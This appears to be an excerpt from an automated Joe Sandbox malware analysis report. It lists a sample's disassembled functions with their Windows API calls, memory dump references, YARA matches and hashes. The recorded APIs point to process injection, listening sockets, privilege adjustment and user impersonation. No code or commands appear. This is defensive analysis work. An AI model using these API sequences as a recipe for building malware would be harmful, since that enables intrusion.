                                                                  Function 00401A70 Relevance: 12.0, APIs: 8, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlCaptureContext.KERNEL32 ref: 00401A84
                                                                  • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                                                                  • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                                                                  • GetCurrentProcess.KERNEL32 ref: 00401B34
                                                                  • TerminateProcess.KERNEL32 ref: 00401B42
                                                                  • abort.MSVCRT ref: 00401B48
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                                                  • String ID:
                                                                  • API String ID: 4278921479-0
                                                                  • Opcode ID: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                                                                  • Instruction ID: cf336b0ec7d2cb6baae35a739632777ca23f94a65b3f666190a75c6fcbb7d788
                                                                  • Opcode Fuzzy Hash: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                                                                  • Instruction Fuzzy Hash: B5210FB5202F45E9EB009B61F98438A33B4BB08B88F40452ADF8E27775EF38C519C708
                                                                  Function 009A29DC Relevance: 10.6, APIs: 7, Instructions: 98memoryinjectionCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastVirtual$AllocFreeMemoryProcessProtectWrite
                                                                  • String ID:
                                                                  • API String ID: 2897431253-0
                                                                  • Opcode ID: 9d639b9db9fe388e0ea0007647f992cc9d7a9c99bc439a06df16a1e995a1a836
                                                                  • Instruction ID: 3c122c00871b3b5210f334adf2322d112136253a2f0dca973dd44468aaa45b43
                                                                  • Opcode Fuzzy Hash: 9d639b9db9fe388e0ea0007647f992cc9d7a9c99bc439a06df16a1e995a1a836
                                                                  • Instruction Fuzzy Hash: 8C310122704B5087DF24AF6AA8447AE73A4BB86F94F0444249E8E83795EF3CC906C790
                                                                  Function 009A50E0 Relevance: 9.1, APIs: 6, Instructions: 60networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Startupbindclosesockethtonsioctlsocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1425508107-0
                                                                  • Opcode ID: e554addcf55df633650e010a70a130abdbe191ef44b404b2205d3ff1c75cc74b
                                                                  • Instruction ID: 96d79a1c6da8bcb37b6513098c02166529d391161a8901be4435bbc37aaacdf1
                                                                  • Opcode Fuzzy Hash: e554addcf55df633650e010a70a130abdbe191ef44b404b2205d3ff1c75cc74b
                                                                  • Instruction Fuzzy Hash: DE11D022308B54C2DB248F16F81036AB3A5F788FB8F990A24EE5A47794DF7CD8458740
                                                                  Function 009A4CD8 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Startupbindclosesockethtonlhtonsioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 2462908977-0
                                                                  • Opcode ID: 1b0c989c961d88eb509ff974df06856b36856af28b3c2505fc1e9dad00bb82bf
                                                                  • Instruction ID: 0f4d5e49fdb2c7e4d9dca190e0aa483ee870ec82d6f273ab5c581e8a2c4ed6e3
                                                                  • Opcode Fuzzy Hash: 1b0c989c961d88eb509ff974df06856b36856af28b3c2505fc1e9dad00bb82bf
                                                                  • Instruction Fuzzy Hash: 7211BE26310B4086EB249F21F8143D93760F789BB8F554625AE6A437D1EFBCD94ACB50
                                                                  Function 009A2258 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64memoryinjectionCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A2296
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • VirtualAllocEx.KERNEL32 ref: 009A22E1
                                                                  • WriteProcessMemory.KERNEL32 ref: 009A2305
                                                                  • free.LIBCMT ref: 009A231B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Alloc_errno$HeapMemoryProcessVirtualWrite_callnewhfreemalloc
                                                                  • String ID: @
                                                                  • API String ID: 1963606803-2766056989
                                                                  • Opcode ID: 0c55abef161af94e8cd7f16b8447d1cf9a29d0a2536f4fd58ba8b88f039371dc
                                                                  • Instruction ID: efc6629070d87daba8478558da0aad19e394fd06c5c27c9d7d32aae4e8c00095
                                                                  • Opcode Fuzzy Hash: 0c55abef161af94e8cd7f16b8447d1cf9a29d0a2536f4fd58ba8b88f039371dc
                                                                  • Instruction Fuzzy Hash: C9210276708B4086DA20CF1AF85075ABBA8F7C9F90F894525AE9D83B25DF3CC546C780
                                                                  Function 0099F5C8 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountSleepTick$Startupclosesocket
                                                                  • String ID:
                                                                  • API String ID: 2132357648-0
                                                                  • Opcode ID: 588ff6f82283d4a7c805e44e29e2c84cb311402872418522d6f8f0303ab7943a
                                                                  • Instruction ID: cffa6a388a5eb79b11e718aa0fef00849408d53743848e93a6122a6cbfbc719c
                                                                  • Opcode Fuzzy Hash: 588ff6f82283d4a7c805e44e29e2c84cb311402872418522d6f8f0303ab7943a
                                                                  • Instruction Fuzzy Hash: 37118E21605B8482DE10AB66F45535AA359B7C5BF0F444720AABE43BE5DE3CC5468B40
                                                                  Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                                                                  • GetCurrentProcessId.KERNEL32 ref: 004019E0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004019E8
                                                                  • GetTickCount.KERNEL32 ref: 004019F0
                                                                  • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  • Opcode ID: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                                                                  • Instruction ID: 088ae4e322ac71afa1741572681cd55a149c1471ea95f8004f9c9491386c013f
                                                                  • Opcode Fuzzy Hash: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                                                                  • Instruction Fuzzy Hash: AA1170A6756B1092FB209B25F90431973A0B788BF4F081A759F9D53BB4DA3CC986C708
                                                                  Function 009AAF84 Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Startupbindclosesockethtonslistensocket
                                                                  • String ID:
                                                                  • API String ID: 3426924835-0
                                                                  • Opcode ID: d3424f860b44bdc497b67123c53142fb4163d3a29e4eaf258a4c9ddadf87f0ed
                                                                  • Instruction ID: 3697b0794098404fc7b932079964f9ba799b85cb960c59f893b7e1c5dcc5c024
                                                                  • Opcode Fuzzy Hash: d3424f860b44bdc497b67123c53142fb4163d3a29e4eaf258a4c9ddadf87f0ed
                                                                  • Instruction Fuzzy Hash: 1511DD26200A6486EA24AF52E80435AB364F785BF4F444625EEAA07BD9DF3CC50AC744
                                                                  Function 0099FE24 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LookupPrivilegeValueA.ADVAPI32 ref: 0099FE9E
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0099FECE
                                                                  • GetLastError.KERNEL32 ref: 0099FED8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                  • String ID: %s
                                                                  • API String ID: 4244140340-620797490
                                                                  • Opcode ID: 2c6d198ceb926170827977084efa5a65a39764af245ea770d1fcf8d01094e782
                                                                  • Instruction ID: 56a16ed30d0f93c67f9121449a59ca47e491f0679fd420dc8e090f029866b0c1
                                                                  • Opcode Fuzzy Hash: 2c6d198ceb926170827977084efa5a65a39764af245ea770d1fcf8d01094e782
                                                                  • Instruction Fuzzy Hash: 7D218E72B00B4199EB10DFB5E4547ED73B9E798B88F44486A8E0C93B59EF74C615C380
                                                                  Function 009AA7DC Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009AA564: CloseHandle.KERNEL32 ref: 009AA574
                                                                    • Part of subcall function 009AA564: RevertToSelf.ADVAPI32 ref: 009AA582
                                                                  • LogonUserA.ADVAPI32 ref: 009AA824
                                                                  • GetLastError.KERNEL32 ref: 009AA82E
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA21
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA49
                                                                    • Part of subcall function 009AAA24: GetTokenInformation.ADVAPI32 ref: 009AAAB9
                                                                  • ImpersonateLoggedOnUser.ADVAPI32 ref: 009AA84C
                                                                  • GetLastError.KERNEL32 ref: 009AA856
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharErrorLastMultiUserWide$CloseHandleImpersonateInformationLoggedLogonRevertSelfTokenmalloc
                                                                  • String ID:
                                                                  • API String ID: 2370685222-0
                                                                  • Opcode ID: 0ef5ffc1e3189335da0d9e4fa28c6e2b011bebfc737b901ea03280a1653a1b6e
                                                                  • Instruction ID: f2dfbc6c967347d7bdbc8a27a3d16a47d678c0616c53a4855a7af90f675bb950
                                                                  • Opcode Fuzzy Hash: 0ef5ffc1e3189335da0d9e4fa28c6e2b011bebfc737b901ea03280a1653a1b6e
                                                                  • Instruction Fuzzy Hash: C3319134708B4086FB01EBA6F85432ABB66A7C6BD4F54412ADD99477B7EF3CC4418380
                                                                  Function 009A3F88 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 009A3FAF
                                                                    • Part of subcall function 0099ED34: WSAStartup.WS2_32 ref: 0099ED52
                                                                  • Sleep.KERNEL32 ref: 009A3FFE
                                                                  • GetTickCount.KERNEL32 ref: 009A4004
                                                                  • WSAGetLastError.WS2_32 ref: 009A400E
                                                                    • Part of subcall function 009A4154: ioctlsocket.WS2_32 ref: 009A4176
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$ErrorLastSleepStartupioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 3100619841-0
                                                                  • Opcode ID: ad234fc6b16c71ade5ac4f0f39529c60848aa73fa2a8e9c9ef1101c36ac769b1
                                                                  • Instruction ID: a758993413d98e1d1acc276acd5fd6dec270602bce292d17cb6a41686564e820
                                                                  • Opcode Fuzzy Hash: ad234fc6b16c71ade5ac4f0f39529c60848aa73fa2a8e9c9ef1101c36ac769b1
                                                                  • Instruction Fuzzy Hash: 21313436B00B4086EB10DBA6E4843AC73B9F7C9BA4F514626DE6D93794DF34C516C380
                                                                  Function 009B82B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $<
                                                                  • API String ID: 0-428540627
                                                                  • Opcode ID: 1c0fd6758a375fb896b6b7ba35f9678d2cb0a137428ce70669a8171ac9488278
                                                                  • Instruction ID: 8a0c879c542f523bc37c80c901894c3182c5593dc963d475e71cadc0cce0c556
                                                                  • Opcode Fuzzy Hash: 1c0fd6758a375fb896b6b7ba35f9678d2cb0a137428ce70669a8171ac9488278
                                                                  • Instruction Fuzzy Hash: F592E1B2325A8087DB58CB1DE4A573AB7A5F3C8B84F44512AEB9B87794CE3CC551CB04
                                                                  Function 0355B58F Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _initp_misc_winsig
                                                                  • String ID:
                                                                  • API String ID: 2710132595-0
                                                                  • Opcode ID: f979b4f846a1532242f867160a3529d6f986bc3965b079700d489e21b19d91cf
                                                                  • Instruction ID: c928518a7a444ce1b3a1fc165eebc3f7a0467a29b03eff076f6f0378b5a5ca24
                                                                  • Opcode Fuzzy Hash: f979b4f846a1532242f867160a3529d6f986bc3965b079700d489e21b19d91cf
                                                                  • Instruction Fuzzy Hash: 78A1AA31A19A488FFF94EF75ED98A9937A2F778301721893A900AC7174DABCE545CF40
                                                                  Function 009B9AF0 Relevance: .6, Instructions: 617COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 98c14e9906981d949b2bced80e093912c501e006eba945978f30f2290b20bb2d
                                                                  • Instruction ID: 0150debcdd1032ba3d257345a0095314281a21798892a16e382b9e4ba10a2022
                                                                  • Opcode Fuzzy Hash: 98c14e9906981d949b2bced80e093912c501e006eba945978f30f2290b20bb2d
                                                                  • Instruction Fuzzy Hash: 755232B23189418BD708CB1DE4A173AB7A1F3C9B80F44852AE79B8B799CE3DD554DB10
                                                                  Function 009B9180 Relevance: .6, Instructions: 592COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 824506dc393073ca40c6ae748ccc67f623d2eb094463fe54b6f3a9da8c359c32
                                                                  • Instruction ID: d9d4f3b7477b0b24f71e3411d45bc1008fdef5357296381e8749220b61472517
                                                                  • Opcode Fuzzy Hash: 824506dc393073ca40c6ae748ccc67f623d2eb094463fe54b6f3a9da8c359c32
                                                                  • Instruction Fuzzy Hash: 8C5263B27189808BD708CF1DE4A173AB7A1F3C9B80F44852AE7978B799CA3CD545DB40
                                                                  Function 0354CBC7 Relevance: .6, Instructions: 558COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 45e6b30be09a604595997fcab8fc315be7e932f4dd03d5cd07d14bfda102088d
                                                                  • Instruction ID: dbafb0b94cf59cf0189bd0c474521d0fe54f64d1ed8d789afafc5a158db1b58d
                                                                  • Opcode Fuzzy Hash: 45e6b30be09a604595997fcab8fc315be7e932f4dd03d5cd07d14bfda102088d
                                                                  • Instruction Fuzzy Hash: 1A02A035654F098BE768EB78D8517A673F1FB98305F184A2DD88BC7661EB38F4828740
                                                                  Function 0099A280 Relevance: .4, Instructions: 404COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 3fde14870ee3ca9cfe182cebf4064cb9456a26658336922528cc0587a0b6c204
                                                                  • Instruction ID: 16992d73b53b8936a44613daa4c7fea5fe82179b40e5381c12bd16ccbd8d9b09
                                                                  • Opcode Fuzzy Hash: 3fde14870ee3ca9cfe182cebf4064cb9456a26658336922528cc0587a0b6c204
                                                                  • Instruction Fuzzy Hash: C5E1C372718A4292DF20CB6DE4912AE63B5F7D5788F904115EF4D87708EF39C946CB81
                                                                  Function 00999D6C Relevance: .4, Instructions: 367COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
